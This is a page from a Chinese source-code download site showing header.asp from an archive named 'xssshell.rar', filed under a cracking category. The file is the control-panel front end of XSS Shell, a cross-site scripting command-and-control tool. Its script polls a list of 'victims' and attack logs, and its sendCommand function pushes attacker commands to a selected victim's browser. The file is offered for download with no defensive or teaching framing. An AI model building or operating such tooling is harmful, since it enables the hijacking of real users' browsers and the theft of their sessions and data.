开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
header.asp
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:3k
源码类别:

破解

开发平台:

ASP/ASPX

header.asp:源码内容
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  5. <title><%=Title%></title>
  6. </head>
  7. <link rel="stylesheet" href="fm.css" type="text/css" media="screen" title="Normal" />
  9. <script language="javascript" src="js/shelladmin.js" type="text/javascript"></script>
  10. <script language="javascript" src="js/soultip.js" type="text/javascript"></script>
  12. <script type="text/javascript" src="js/prototype.lite.js"></script>
  13. <script type="text/javascript" src="js/moo.ajax.js"></script>
  15. <script src="js/ous/prototype.js" type="text/javascript"></script>
  16. <script src="js/ous/scriptaculous.js" type="text/javascript"></script>
  18. <script>
  20. var LOGUPDATE_FREQ = 1000;
  21. var VICTIM_FREQ = 1000;
  22. var VICTIM;
  24. function viclist(response){
  25. VICTIM = response.substring(response.lastIndexOf("[")+1);
  26. }
  28. // Push new commands
  29. function sendCommand(cmd){
  30. var attackID = generateID();
  31. var param = encodeURIComponent(document.getElementById("params").value);
  32. var url = SAVE_URL + "?c=" + cmd + "&p=" + param + "&v=" + VICTIM;
  34. getRequest( url, "debug('Message sent :' + " + CALLBACK_PARAM + " + ', AttackID:Rnd()')");
  35. debug(url + " - Message is sending...");
  37. }
  39. function updateLog(){
  40. new ajax(LOGS_URL + "&r=" + generateID(), {updateEscape: $("log"), onComplete: logChanged});
  41. }
  43. function updateVic(){
  44. new ajax(VICTIMS_URL + "&r=" + generateID(), {updateEscape: $("victimsUpdater"), onComplete: vicChanged}); 
  45. }
  47. var logCache="", vicCache="";
  48. function logChanged(request){
  49. if(request.responseText != logCache){
  50. new Effect.Highlight(document.getElementById("log"), "#ffff99")
  51. }
  53. logCache = request.responseText;
  54. window.setTimeout("updateLog()", LOGUPDATE_FREQ);
  55. }
  57. function vicChanged(request){
  58. if(request.responseText != vicCache){
  59. new Effect.Highlight(document.getElementById("victimsUpdater"), "#ffff99")
  60. viclist(request.responseText);
  61. }
  63. vicCache = request.responseText;
  64. window.setTimeout("updateVic()", VICTIM_FREQ);
  65. }
  67. function toggle(id){
  68. new Effect.SlideDown(document.getElementById(id));
  69. }
  71. function hi(div){
  72. div.className = "commandh";
  73. }
  75. function lo(div){
  76. div.className = "commandl";
  77. }
  79. window.onLoad=init();
  81. function init(){
  82. updateLog();
  83. updateVic();
  84. }
  85. </script>
  87. <body>
  88. <div id="header"><img src="mg/lg.gif" width="28" height="148" border="0" alt="XSS Shell" /></div>